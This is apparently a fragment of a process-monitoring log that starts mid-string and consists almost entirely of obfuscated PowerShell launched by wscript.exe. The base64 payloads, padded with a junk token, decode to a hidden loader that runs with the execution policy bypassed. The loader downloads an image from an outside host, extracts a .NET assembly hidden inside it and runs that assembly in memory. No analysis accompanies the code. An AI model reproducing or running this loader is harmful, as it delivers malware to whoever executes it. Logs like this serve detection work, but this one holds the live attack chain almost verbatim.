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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" | ||||||
parent_process | wscript.exe | martian_process | powershell -command "$Codigo = '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CcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIg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